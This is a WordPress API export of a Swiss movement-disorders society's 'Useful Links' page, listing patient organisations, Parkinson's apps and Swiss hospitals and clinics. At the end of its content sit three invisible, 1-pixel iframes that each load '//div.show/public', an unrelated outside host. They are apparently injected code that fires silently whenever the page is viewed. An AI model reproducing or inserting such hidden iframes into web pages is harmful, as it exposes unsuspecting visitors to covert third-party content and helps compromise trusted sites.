{"id":930,"date":"2018-11-21T14:52:42","date_gmt":"2018-11-21T12:52:42","guid":{"rendered":"https:\/\/www.movementdisorders.ch\/index\/?page_id=930"},"modified":"2025-05-25T15:52:04","modified_gmt":"2025-05-25T13:52:04","slug":"links","status":"publish","type":"page","link":"https:\/\/www.movementdisorders.ch\/index\/links\/","title":{"rendered":"Useful Links"},"content":{"rendered":"<div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-1 nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"--awb-background-position:left top;--awb-border-radius-top-left:0px;--awb-border-radius-top-right:0px;--awb-border-radius-bottom-right:0px;--awb-border-radius-bottom-left:0px;--awb-margin-top:3%;--awb-margin-bottom:0px;--awb-flex-wrap:wrap;\" ><div class=\"fusion-builder-row fusion-row\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-0 fusion_builder_column_1_1 1_1 fusion-one-full fusion-column-first fusion-column-last\" style=\"--awb-bg-size:cover;--awb-margin-bottom:0px;\"><div class=\"fusion-column-wrapper fusion-flex-column-wrapper-legacy\"><div class=\"fusion-title title fusion-title-1 fusion-sep-none fusion-title-center fusion-title-text fusion-title-size-two\" style=\"--awb-margin-bottom:10px;\"><h2 class=\"fusion-title-heading title-heading-center fusion-responsive-typography-calculated\" style=\"margin:0;--fontSize:47;line-height:1.2;\"><h2 style=\"text-align: left;\"><span style=\"color: #091d36;\">Useful Links<br \/>\n<\/span><\/h2><\/h2><\/div><div class=\"fusion-text fusion-text-1\"><p>The SMDS is a multidisciplinary society for health-care professionals. Here you can find links to patient organizations.<\/p>\n<\/div><div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-separator fusion-clearfix\" style=\"float:left;margin-top:10px;margin-bottom:30px;width:100%;max-width:70%;\"><div class=\"fusion-separator-border sep-single\" style=\"--awb-height:20px;--awb-amount:20px;--awb-sep-color:#091d36;border-color:#091d36;border-top-width:1px;\"><\/div><\/div><div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-text fusion-text-2 awb-text-cols fusion-text-columns-2\" style=\"--awb-columns:2;--awb-column-spacing:2em;--awb-column-min-width:100px;\"><p>Swiss Parkinson App<\/p>\n<\/div><div class=\"awb-gallery-wrapper awb-gallery-wrapper-1 button-span-no\"><div style=\"margin:-5px;--awb-bordersize:0px;\" class=\"fusion-gallery fusion-gallery-container fusion-grid-5 fusion-columns-total-3 fusion-gallery-layout-grid fusion-gallery-1\"><div style=\"padding:5px;\" class=\"fusion-grid-column fusion-gallery-column fusion-gallery-column-5 hover-type-none\"><div class=\"fusion-gallery-image\"><a href=\"https:\/\/www.movementdisorders.ch\/index\/wp-content\/uploads\/2021\/05\/SwissParkinsonApp_F-pdf.jpg\" rel=\"noreferrer\" data-rel=\"iLightbox[gallery_image_1]\" class=\"fusion-lightbox\" target=\"_self\"><img decoding=\"async\" src=\"https:\/\/www.movementdisorders.ch\/index\/wp-content\/uploads\/2021\/05\/SwissParkinsonApp_F-pdf.jpg\" width=\"143\" height=\"202\" alt=\"\" title=\"Swiss Parkinson App (fran\u00e7ais)\" aria-label=\"Swiss Parkinson App (fran\u00e7ais)\" class=\"img-responsive wp-image-1263 fusion-gallery-image-size-fixed\"  \/><\/a><\/div><\/div><div style=\"padding:5px;\" class=\"fusion-grid-column fusion-gallery-column fusion-gallery-column-5 hover-type-none\"><div class=\"fusion-gallery-image\"><a href=\"https:\/\/www.movementdisorders.ch\/index\/wp-content\/uploads\/2021\/05\/SwissParkinsonApp_DE-pdf.jpg\" rel=\"noreferrer\" data-rel=\"iLightbox[gallery_image_1]\" class=\"fusion-lightbox\" target=\"_self\"><img decoding=\"async\" src=\"https:\/\/www.movementdisorders.ch\/index\/wp-content\/uploads\/2021\/05\/SwissParkinsonApp_DE-pdf.jpg\" width=\"143\" height=\"202\" alt=\"\" title=\"Swiss Parkinson App (deutsch)\" aria-label=\"Swiss Parkinson App (deutsch)\" class=\"img-responsive wp-image-1262 fusion-gallery-image-size-fixed\"  \/><\/a><\/div><\/div><div style=\"padding:5px;\" class=\"fusion-grid-column fusion-gallery-column fusion-gallery-column-5 hover-type-none\"><div class=\"fusion-gallery-image\"><a href=\"https:\/\/www.movementdisorders.ch\/index\/wp-content\/uploads\/2021\/05\/SwissParkinsonApp_I-pdf.jpg\" rel=\"noreferrer\" data-rel=\"iLightbox[gallery_image_1]\" class=\"fusion-lightbox\" target=\"_self\"><img decoding=\"async\" src=\"https:\/\/www.movementdisorders.ch\/index\/wp-content\/uploads\/2021\/05\/SwissParkinsonApp_I-pdf.jpg\" width=\"143\" height=\"202\" alt=\"\" title=\"Swiss Parkinson App (italiano)\" aria-label=\"Swiss Parkinson App (italiano)\" class=\"img-responsive wp-image-1261 fusion-gallery-image-size-fixed\"  \/><\/a><\/div><\/div><\/div><\/div><div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-separator fusion-clearfix\" style=\"float:left;margin-top:10px;margin-bottom:30px;width:100%;max-width:70%;\"><div class=\"fusion-separator-border sep-single\" style=\"--awb-height:20px;--awb-amount:20px;--awb-sep-color:#091d36;border-color:#091d36;border-top-width:1px;\"><\/div><\/div><div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-clearfix\"><\/div><\/div><\/div><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-1 fusion_builder_column_1_2 1_2 fusion-one-half fusion-column-first\" style=\"--awb-bg-size:cover;width:50%;width:calc(50% - ( ( 4% ) * 0.5 ) );margin-right: 4%;\"><div class=\"fusion-column-wrapper fusion-flex-column-wrapper-legacy\"><div class=\"fusion-text fusion-text-3\"><p>Swiss Parkinson&#8217;s Disease Nursing Specialist<br \/>\n<a href=\"https:\/\/swiss-pdns.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">swiss-pdns.ch<\/a><\/p>\n<p>International Parkinson and Movement Disorders Society<br \/>\n<a href=\"https:\/\/www.movementdisorders.org\/MDS.htm\" target=\"_blank\" rel=\"noopener noreferrer\">movementdisorders.org<\/a><\/p>\n<p>Parkinson Schweiz Suisse Svizzera<br \/>\n<a href=\"https:\/\/www.parkinson.ch\" target=\"_blank\" rel=\"noopener noreferrer\">parkinson.ch<\/a><\/p>\n<p>Parkinson Team Basel und Nordwestschweiz<br \/>\n<a href=\"http:\/\/www.parkinson-team.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">parkinson-team.ch<\/a><\/p>\n<p>Fachgruppe Physiotherapie Parkinson<br \/>\n<a href=\"https:\/\/www.fp-parkinson.ch\/\" target=\"_blank\" rel=\"noopener\">fp-parkinson.ch<\/a><\/p>\n<p>Schweizerische Dystonie-Gesellschaft<br \/>\n<a href=\"http:\/\/www.dystonie.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\" data-saferedirecturl=\"https:\/\/www.google.com\/url?q=http:\/\/www.dystonie.ch\/&amp;source=gmail&amp;ust=1544538124686000&amp;usg=AFQjCNFXMQB-mXdeWyYgpOqOXzGXruDkcw\">dystonie.ch<\/a><\/p>\n<p>ProRaris<br \/>\n<a href=\"https:\/\/www.proraris.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">proraris.ch<\/a><\/p>\n<p>Please send all your suggestions to: <a href=\"mailto:smds@hin.ch\" target=\"_blank\" rel=\"noopener\">smds@hin.ch<\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div><\/div><\/div><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-2 fusion_builder_column_1_2 1_2 fusion-one-half fusion-column-last\" style=\"--awb-bg-size:cover;width:50%;width:calc(50% - ( ( 4% ) * 0.5 ) );\"><div class=\"fusion-column-wrapper fusion-flex-column-wrapper-legacy\"><div class=\"fusion-text fusion-text-4\"><p>Klinik Valens<br \/>\n<a href=\"http:\/\/www.klinik-valens.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">klinik-valens.ch<\/a><\/p>\n<p>Klinik Bethesda, Parkinsonzentrum, Tschugg<br \/>\n<a href=\"http:\/\/www.klinik-bethesda.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">klinik-bethesda.ch<\/a><\/p>\n<p>Luzerner Kantonsspital LUKS<br \/>\n<a href=\"http:\/\/www.luks.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">luks.ch<\/a><\/p>\n<p>Neurocentro della Svizzera Italiana, Lugano<br \/>\n<a href=\"https:\/\/www.eoc.ch\/Centri-specialistici\/NSI\/NSI.html\" target=\"_blank\" rel=\"noopener noreferrer\">eoc.ch<\/a><\/p>\n<p>Reha Rheinfelden<br \/>\n<a href=\"http:\/\/www.reha-rheinfelden.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">reha-rheinfelden.ch<\/a><\/p>\n<p>Universit\u00e4tsspital Basel<br \/>\n<a href=\"https:\/\/www.unispital-basel.ch\/zuweisende\/klinik-uebersicht\/zuweisende-neurologie#sprechstunden\" target=\"_blank\" rel=\"noopener noreferrer\">usb.ch<\/a><\/p>\n<p>Universit\u00e4tsspital Z\u00fcrich USZ<br \/>\n<a href=\"http:\/\/www.usz.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">usz.ch<\/a><\/p>\n<p>Centre hospitalier universitaire vaudois<br \/>\n<a href=\"https:\/\/www.chuv.ch\/fr\/neurologie\/nlg-home\/patients-et-familles\/nos-unites\/unite-des-mouvements-anormaux\">chuv.ch<\/a><\/p>\n<p>Kantonsspital Aarau<br \/>\n<a href=\"https:\/\/www.ksa.ch\/zentren-kliniken\/neurologie\/leistungsangebot#bewegungsstoerungen_\" target=\"_blank\" rel=\"noopener noreferrer\">ksa.ch<\/a><\/p>\n<p>Kantonsspital St.Gallen<br \/>\n<a href=\"https:\/\/www.kssg.ch\/neurologie\" target=\"_blank\" rel=\"noopener noreferrer\" data-saferedirecturl=\"https:\/\/www.google.com\/url?q=https:\/\/www.kssg.ch\/neurologie&amp;source=gmail&amp;ust=1552551502855000&amp;usg=AFQjCNEfzAyOauuCU17L_kVYnj86eLhJzA\">kssg.ch\/neurologie<\/a><\/p>\n<p>Rehaklinik Zihlschlacht, Parkinsonzentrum<br \/>\n<a href=\"http:\/\/www.rehaklinik-zihlschlacht.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">rehaklinik-zihlschlacht.ch<\/a><\/p>\n<p>H\u00f4pital Pourtal\u00e8s, Neuch\u00e2tel<br \/>\n<a href=\"http:\/\/www.hopital-ne.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">hopital-ne.ch<\/a><\/p>\n<p>Inselspital Bern<br \/>\n<a href=\"http:\/\/www.insel.ch\/\" target=\"_blank\" rel=\"noopener noreferrer\">insel.ch<\/a><\/p>\n<p>Swiss HD Center, NeuroZentrum, Siloah AG, G\u00fcmligen (Muri bei Bern)<br \/>\n<a href=\"http:\/\/huntington-suisse.ch\/\">huntington-suisse.ch<\/a><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<\/div><div class=\"fusion-clearfix\"><\/div><\/div><\/div><\/div><\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"100-width.php","meta":{"footnotes":""},"class_list":["post-930","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/pages\/930","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/comments?post=930"}],"version-history":[{"count":23,"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/pages\/930\/revisions"}],"predecessor-version":[{"id":2758,"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/pages\/930\/revisions\/2758"}],"wp:attachment":[{"href":"https:\/\/www.movementdisorders.ch\/index\/wp-json\/wp\/v2\/media?parent=930"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}